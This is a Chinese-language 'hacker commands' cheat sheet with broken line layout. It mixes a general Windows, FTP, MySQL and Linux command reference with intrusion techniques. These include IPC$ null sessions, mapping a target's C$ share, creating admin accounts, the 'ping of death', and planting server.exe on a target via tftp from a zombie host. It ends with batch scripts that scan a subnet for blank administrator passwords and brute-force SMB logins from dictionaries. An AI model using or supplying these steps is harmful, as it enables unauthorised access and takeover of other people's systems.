net use $">\\ip\ipc$ " " /user:" "
建立
IPC
空链接
net use $">\\ip\ipc$ "
密码
" /user:"
用户名
"
建立
IPC
非空链接
net use h: $">\\ip\c$ "
密码
" /user:"
用户名
"
直接登陆后映射对方
C
:到本地为
H:
net use h: $">\\ip\c$
登陆后映射对方
C
:到本地为
H:
net use $">\\ip\ipc$ /del
删除
IPC
链接
net use h: /del
删除映射对方到本地的为
H:
的映射
net user
用户名 密码
/add
建立用户
net user guest /active:yes
激活
guest
用户
net user
查看有哪些用户
net user
帐户名 查看帐户的属性
net localgroup administrators
用户名
/add
把“用户”添加到管理员中使其具有管理员权限
,
注意:
administrator
后加
s
用复数
net start
查看开启了哪些服务
net start
服务名 开启服务;
(
如
:net start telnet
,
net start schedule)
net stop
服务名 停止某服务
net time \\
目标
ip
查看对方时间
net time \\
目标
ip /set
设置本地计算机时间与“目标
IP
”主机的时间同步
,
加上参数
/yes
可取
消确认信息
net view
查看本地局域网内开启了哪些共享
net view \\ip
查看对方局域网内开启了哪些共享
net config
显示系统网络设置
net logoff
断开连接的共享
net pause
服务名 暂停某服务
net send ip "
文本信息
"
向对方发信息
net ver
局域网内正在使用的网络连接类型和信息
net share
查看本地开启的共享
net share ipc$
开启
ipc$
共享
net share ipc$ /del
删除
ipc$
共享
net share c$ /del
删除
C
:共享
net user guest 12345
用
guest
用户登陆后用将密码改为
12345
net password
密码 更改系统登陆密码
netstat -a
查看开启了哪些端口
,
常用
netstat -an
netstat -n
查看端口的网络连接情况,常用
netstat -an
netstat -v
查看正在进行的工作
netstat -p
协议名 例:
netstat -p tcq/ip
查看某协议使用情况(查看
tcp/ip
协议使用情况)
netstat -s
查看正在使用的所有协议使用情况
nbtstat -A ip
对方
136
到
139
其中一个端口开了的话,就可查看对方最近登陆的用户名(
03
前的为用户名)
-
注意:参数
-A
要大写
tracert -
参数
ip(
或计算机名
)
跟踪路由(数据包),参数:“
-w
数字”用于设置超时间隔。
ping ip(
或域名
)
向对方主机发送默认大小为
32
字节的数据,参数:“
-l[
空格
]
数据包大小”;
“
-n
发送数据次数”;“
-t
”指一直
ping
。
ping -t -l 65550 ip
死亡之
ping(
发送大于
64K
的文件并一直
ping
就成了死亡之
ping)
ipconfig (winipcfg)
用于
windows NT
及
XP(windows 95 98)
查看本地
ip
地址,
ipconfig
可用
参数“
/all
”显示全部配置信息
tlist -t
以树行列表显示进程
(
为系统的附加工具,默认是没有安装的,在安装目录的
Support/tools
文件夹内
)
kill -F
进程名 加
-F
参数后强制结束某进程
(
为系统的附加工具,默认是没有安装的,在安装
目录的
Support/tools
文件夹内
)
del -F
文件名 加
-F
参数后就可删除只读文件
,/AR
、
/AH
、
/AS
、
/AA
分别表示删除只读、隐
藏、系统、存档文件,
/A-R
、
/A-H
、
/A-S
、
/A-A
表示删除除只读、隐藏、系统、存档以外
的文件。例如“
DEL/AR *.*
”表示删除当前目录下所有只读文件,“
DEL/A-S *.*
”表示删除
当前目录下除系统文件以外的所有文件
del /S /Q
目录 或用:
rmdir /s /Q
目录
/S
删除目录及目录下的所有子目录和文件。同时使用
参数
/Q
可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move
盘符
\
路径
\
要移动的文件名 存放移动文件的路径
\
移动后文件名 移动文件
,
用参数
/y
将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt > 3st.txt
对比二个文件并把不同之处输出到
3st.txt
文件中,
"> "
和
"> >"
是
重定向命令
at id
号 开启已注册的某个计划任务
DOS 黑客常用命令大全
at /delete
停止所有计划任务,用参数
/yes
则不需要确认就直接停止
at id
号
/delete
停止某个已注册的计划任务
at
查看所有的计划任务
at \\ip time
程序名
(
或一个命令
) /r
在某时间运行对方某程序并重新启动计算机
finger username @host
查看最近有哪些用户登陆
telnet ip
端口 远和登陆服务器
,
默认端口为
23
open ip
连接到
IP
(属
telnet
登陆后的命令)
telnet
在本机上直接键入
telnet
将进入本机的
telnet
copy
路径
\
文件名
1
路径
\
文件名
2 /y
复制文件
1
到指定的目录为文件
2
,用参数
/y
就同时
取消确认你要改写一份现存目录文件
copy c:\srv.exe $">\\ip\admin$
复制本地
c:\srv.exe
到对方的
admin
下
cppy 1st.jpg/b+2st.txt/a 3st.jpg
将
2st.txt
的内容藏身到
1st.jpg
中生成
3st.jpg
新的文件,注:
2st.txt
文件头要空三排,参数:
/b
指二进制文件,
/a
指
ASCLL
格式文件
copy $\svv.exe">\\ip\admin$\svv.exe c:\
或
:copy\\ip\admin$\*.*
复制对方
admini$
共享下的
srv.exe
文件(所有文件)至本地
C
:
xcopy
要复制的文件或目录树 目标地址
\
目录名 复制文件和目录树,用参数
/Y
将不提示覆
盖相同文件
tftp -i
自己
IP(
用肉机作跳板时这用肉机
IP) get server.exe c:\server.exe
登陆后,将“
IP
”的
server.exe
下载到目标主机
c:\server.exe
参数:
-i
指以二进制模式传送,如传送
exe
文件时用,
如不加
-i
则以
ASCII
模式(传送文本文件模式)进行传送
tftp -i
对方
IP put c:\server.exe
登陆后,上传本地
c:\server.exe
至主机
ftp ip
端口 用于上传文件至服务器或进行文件操作,默认端口为
21
。
bin
指用二进制方式传
送(可执行文件进);默认为
ASCII
格式传送
(
文本文件时
)
route print
显示出
IP
路由,将主要显示网络地址
Network addres
,子网掩码
Netmask
,网关
地址
Gateway addres
,接口地址
Interface
arp
查看和处理
ARP
缓存,
ARP
是名字解析的意思,负责把一个
IP
解析成一个物理性的
MAC
地址。
arp -a
将显示出全部信息
start
程序名或命令
/max
或
/min
新开一个新窗口并最大化(最小化)运行某程序或命令
mem
查看
cpu
使用情况
attrib
文件名
(
目录名
)
查看某文件(目录)的属性
attrib
文件名
-A -R -S -H
或
+A +R +S +H
去掉
(
添加
)
某文件的 存档,只读,系统,隐藏 属
性;用+则是添加为某属性
dir
查看文件,参数:
/Q
显示文件及目录属系统哪个用户,
/T:C
显示文件创建时间,
/T:A
显
示文件上次被访问时间,
/T:W
上次被修改时间
date /t
、
time /t
使用此参数即“
DATE/T
”、“
TIME/T
”将只显示当前日期和时间,而不必
输入新日期和时间
set
指定环境变量名称
=
要指派给变量的字符 设置环境变量
set
显示当前所有的环境变量
set p(
或其它字符
)
显示出当前以字符
p(
或其它字符
)
开头的所有环境变量
pause
暂停批处理程序,并显示出:请按任意键继续
....
if
在批处理程序中执行条件处理(更多说明见
if
命令及变量)
goto
标签 将
cmd.exe
导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,
例如:“:
start
”标签)
call
路径
\
批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见
call /?
)
for
对一组文件中的每一个文件执行某个特定命令(更多说明见
for
命令及变量)
echo on
或
off
打开或关闭
echo
,仅用
echo
不加参数则显示当前
echo
设置
echo
信息 在屏幕上显示出信息
echo
信息
>> pass.txt
将
"
信息
"
保存到
pass.txt
文件中
findstr "Hello" aa.txt
在
aa.txt
文件中寻找字符串
hello
find
文件名 查找某文件
title
标题名字 更改
CMD
窗口标题名字
color
颜色值 设置
cmd
控制台前景和背景颜色;
0
=黑、
1
=蓝、
2
=绿、
3
=浅绿、
4
=红、
5
=紫、
6
=黄、
7=
白、
8=
灰、
9=
淡蓝、
A
=淡绿、
B=
淡浅绿、
C=
淡红、
D=
淡紫、
E=
淡黄、
F=
亮白
prompt
名称 更改
cmd.exe
的显示的命令提示符
(
把
C:\
、
D:\
统一改为:
EntSky\ )
print
文件名 打印文本文件
ver
在
DOS
窗口下显示版本信息
winver
弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
format
盘符
/FS:
类型 格式化磁盘
,
类型
:FAT
、
FAT32
、
NTFS ,
例:
Format D: /FS:NTFS
md
目录名 创建目录
replace
源文件 要替换文件的目录 替换文件
ren
原文件名 新文件名 重命名文件名
tree
以树形结构显示出目录,用参数
-f
将列出第个文件夹中文件名称
type
文件名 显示文本文件的内容
more
文件名 逐屏显示输出文件
doskey
要锁定的命令=字符
doskey
要解锁命令
=
为
DOS
提供的锁定命令
(
编辑命令行,重新调用
win2k
命令,并创建
宏
)
。如:锁定
dir
命令:
doskey dir=entsky (
不能用
doskey dir=dir)
;解锁:
doskey dir=
taskmgr
调出任务管理器
chkdsk /F D:
检查磁盘
D
并显示状态报告;加参数
/f
并修复磁盘上的错误
tlntadmn telnt
服务
admn,
键入
tlntadmn
选择
3
,再选择
8,
就可以更改
telnet
服务默认端口
23
为其它任何端口
exit
退出
cmd.exe
程序或目前,用参数
/B
则是退出当前批处理脚本而不是
cmd.exe
path
路径
\
可执行文件的文件名 为可执行文件设置一个路径。
cmd
启动一个
win2K
命令解释窗口。参数:
/eff
、
/en
关闭、开启命令扩展;更我详细说明
见
cmd /?
regedit /s
注册表文件名 导入注册表;参数
/S
指安静模式导入,无任何提示;
regedit /e
注册表文件名 导出注册表
cacls
文件名 参数 显示或修改文件访问控制列表(
ACL
)——针对
NTFS
格式时。参数:
/D
用户名
:
设定拒绝某用户访问;
/P
用户名
:perm
替换指定用户的访问权限;
/G
用户
名
:perm
赋予指定用户访问权限;
Perm
可以是
: N
无,
R
读取,
W
写入,
C
更改
(
写入
)
,
F
完全控制;例:
cacls D:\test.txt /D pub
设定
d:\test.txt
拒绝
pub
用户访问。
cacls
文件名 查看文件的访问用户权限列表
REM
文本内容 在批处理文件中添加注解
netsh
查看或更改本地网络配置情况
IIS
服务命令:
iisreset /reboot
重启
win2k
计算机(但有提示系统将重启信息出现)
iisreset /start
或
stop
启动(停止)所有
Internet
服务
iisreset /restart
停止然后重新启动所有
Internet
服务
iisreset /status
显示所有
Internet
服务状态
iisreset /enable
或
disable
在本地系统上启用(禁用)
Internet
服务的重新启动
iisreset /rebootonerror
当启动、停止或重新启动
Internet
服务时,若发生错误将重新开机
iisreset /noforce
若无法停止
Internet
服务,将不会强制终止
Internet
服务
iisreset /timeout Val
在到达逾时间(秒)时,仍未停止
Internet
服务,若指定
/rebootonerror
参数,则电脑将会重新开机。预设值为重新启动
20
秒,停止
60
秒,重新开机
0
秒。
FTP
命令:
(
后面有详细说明内容
)
ftp
的命令行格式为
:
ftp
-
v
-
d
-
i
-
n
-
g[
主机名
]
-
v
显示远程服务器的所有响应信息。
-
d
使用调试方式。
-
n
限制
ftp
的自动登录
,
即不使用
.netrc
文件。
-
g
取消全局文件名。
help [
命令
]
或 ?
[
命令
]
查看命令说明
bye
或
quit
终止主机
FTP
进程
,
并退出
FTP
管理方式
.
pwd
列出当前远端主机目录
put
或
send
本地文件名
[
上传到主机上的文件名
]
将本地一个文件传送至远端主机中
get
或
recv [
远程主机文件名
] [
下载到本地后的文件名
]
从远端主机中传送至本地主机中
mget [remote-files]
从远端主机接收一批文件至本地主机
mput local-files
将本地主机中一批文件传送至远端主机
dir
或
ls [remote-directory] [local-file]
列出当前远端主机目录中的文件
.
如果有本地文件
,
就
将结果写至本地文件
ascii
设定以
ASCII
方式传送文件
(
缺省值
)
bin
或
image
设定以二进制方式传送文件
bell
每完成一次文件传送
,
报警提示
cdup
返回上一级目录
close
中断与远程服务器的
ftp
会话
(
与
open
对应
)
open host[port]
建立指定
ftp
服务器连接
,
可指定连接端口
delete
删除远端主机中的文件
mdelete [remote-files]
删除一批文件
mkdir directory-name
在远端主机中建立目录
rename [from] [to]
改变远端主机中的文件名
rmdir directory-name
删除远端主机中的目录
status
显示当前
FTP
的状态
system
显示远端主机系统类型
user user-name [password] [account]
重新以别的用户名登录远端主机
open host [port]
重新建立一个新的连接
prompt
交互提示模式
macdef
定义宏命令
lcd
改变当前本地主机的工作目录
,
如果缺省
,
就转到当前用户的
HOME
目录
chmod
改变远端主机的文件权限
case
当为
ON
时
,
用
MGET
命令拷贝的文件名到本地机器中
,
全部转换为小写字母
cd remote
-
dir
进入远程主机目录
cdup
进入远程主机目录的父目录
在本地机中执行交互
shell
,
exit
回到
ftp
环境
,
如
!ls
*
.zip
MYSQL
命令:
mysql -h
主机地址
-u
用户名 -
p
密码 连接
MYSQL;
如果刚安装好
MYSQL
,超级用户
root
是没有密码的。
(例:
mysql -h110.110.110.110 -Uroot -P123456
注
:u
与
root
可以不用加空格,其它也一样)
exit
退出
MYSQL
mysqladmin -u
用户名
-p
旧密码
password
新密码 修改密码
grant select on
数据库
.* to
用户名
@
登录主机
identified by \"
密码
\";
增加新用户。(注意:和
上面不同,下面的因为是
MYSQL
环境中的命令,所以后面都带一个分号作为命令结束符)
show databases;
显示数据库列表。刚开始时才两个数据库:
mysql
和
test
。
mysql
库很重要它
里面有
MYSQL
的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。
use mysql
;
show tables;
显示库中的数据表
describe
表名
;
显示数据表的结构
create database
库名
;
建库
use
库名;
create table
表名
(
字段设定列表
)
; 建表
drop database
库名
;
drop table
表名; 删库和删表
delete from
表名
;
将表中记录清空
select * from
表名
;
显示表中的记录
mysqldump --opt school>school.bbb
备份数据库:(命令在
DOS
的
\\mysql\\bin
目录下执行)
;
注释
:
将数据库
school
备份到
school.bbb
文件,
school.bbb
是一个文本文件,文件名任取,打
开看看你会有新发现。
win2003
系统下新增命令(实用部份):
shutdown /
参数 关闭或重启本地或远程主机。
参数说明:
/S
关闭主机,
/R
重启主机,
/T
数字 设定延时的时间,范围
0
~
180
秒之间,
/A
取消开机,
/M //IP
指定的远程主机。
例:
shutdown /r /t 0
立即重启本地主机(无延时)
taskill /
参数 进程名或进程的
pid
终止一个或多个任务和进程。
参数说明:
/PID
要终止进程的
pid,
可用
tasklist
命令获得各进程的
pid
,
/IM
要终止的进程的
进程名,
/F
强制终止进程,
/T
终止指定的进程及他所启动的子进程。
tasklist
显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符
(PID)
。
参数说明:
/M
列出当前进程加载的
dll
文件,
/SVC
显示出每个进程对应的服务,无参数时
就只列出当前的进程。
Linux
系统下基本命令: 要区分大小写
uname
显示版本信息(同
win2K
的
ver
)
dir
显示当前目录文件
,ls -al
显示包括隐藏文件(同
win2K
的
dir
)
pwd
查询当前所在的目录位置
cd cd ..
回到上一层目录,注意
cd
与
..
之间有空格。
cd /
返回到根目录。
cat
文件名 查看文件内容
cat >abc.txt
往
abc.txt
文件中写上内容。
more
文件名 以一页一页的方式显示一个文本文件。
cp
复制文件
mv
移动文件
rm
文件名 删除文件,
rm -a
目录名删除目录及子目录
DOS 黑客常用命令大全
mkdir
目录名 建立目录
rmdir
删除子目录,目录内没有文档。
chmod
设定档案或目录的存取权限
grep
在档案中查找字符串
diff
档案文件比较
find
档案搜寻
date
现在的日期、时间
who
查询目前和你使用同一台机器的人以及
Login
时间地点
w
查询目前上机者的详细资料
whoami
查看自己的帐号名称
groups
查看某人的
Group
passwd
更改密码
history
查看自己下过的命令
ps
显示进程状态
kill
停止某进程
gcc
黑客通常用它来编译
C
语言写的文件
su
权限转换为指定使用者
telnet IP telnet
连接对方主机(同
win2K
),当出现
bash$
时就说明连接成功。
ftp ftp
连接上某服务器(同
win2K
)
附:批处理命令与变量
1
:
for
命令及变量 基本格式:
FOR /
参数
%variable IN (set) DO command [command_parameters] %variable:
指定一个单一
字母可替换的参数,如:
%i
,而指定一个变量则用:
%%i
,而调用变量时用:
%i%
,变
量是区分大小写的(
%i
不等于
%I
)。
批处理每次能处理的变量从
%0
—
%9
共
10
个,其中
%0
默认给批处理文件名使用,
%1
默认
为使用此批处理时输入的的第一个值,同理:
%2
—
%9
指输入的第
2-9
个值;例:
net use
$">\\ip\ipc$ pass /user:user
中
ip
为
%1,pass
为
%2 ,user
为
%3
(set):
指定一个或一组文件,可使用通配符,如:
(D:\user.txt)
和
(1 1 254)(1 -1 254),{
“
(1 1 254)
”
第一个
"1"
指起始值,第二个
"1"
指增长量,第三个
"254"
指结束值,即:从
1
到
254
;“
(1 -1 254)
”
说明:即从
254
到
1}
command
:指定对第个文件执行的命令,如:
net use
命令;如要执行多个命令时,命令这间
加:
&
来隔开
command_parameters
:为特定命令指定参数或命令行开关
IN (set)
:指在
(set)
中取值;
DO command
:指执行
command
参数:
/L
指用增量形式
{(set)
为增量形式时
}
;
/F
指从文件中不断取值,直到取完为止
{(set)
为文件时,如
(d:\pass.txt)
时
}
。
用法举例:
@echo off
echo
用法格式:
test.bat *.*.* > test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator |
find "
命令成功完成
" >>test.txt
存为
test.bat
说明:对指定的一个
C
类网段的
254
个
IP
依次试建立
administrator
密码为空的
IPC$
连接,如果成功就把该
IP
存在
test.txt
中。
/L
指用增量形式(即从
1-254
或
254-1
);输入的
IP
前面三位:
*.*.*
为批处理默认的
%1
;
%%G
为变量
(ip
的最后一位);
&
用来隔开
echo
和
net use
这二个命令;
|
指建立了
ipc$
后,在结
果中用
find
查看是否有
"
命令成功完成
"
信息;
%1.%%G
为完整的
IP
地址;
(1 1 254)
指起始
值,增长量,结止值。
@echo off
echo
用法格式:
ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存为:
ok.exe
说明:输入一个
IP
后,用字典文件
d:\pass.dic
来暴解
d:\user.dic
中的用户密码,
直到文件中值取完为止。
%%i
为用户名;
%1
为输入的
IP
地址(默认)。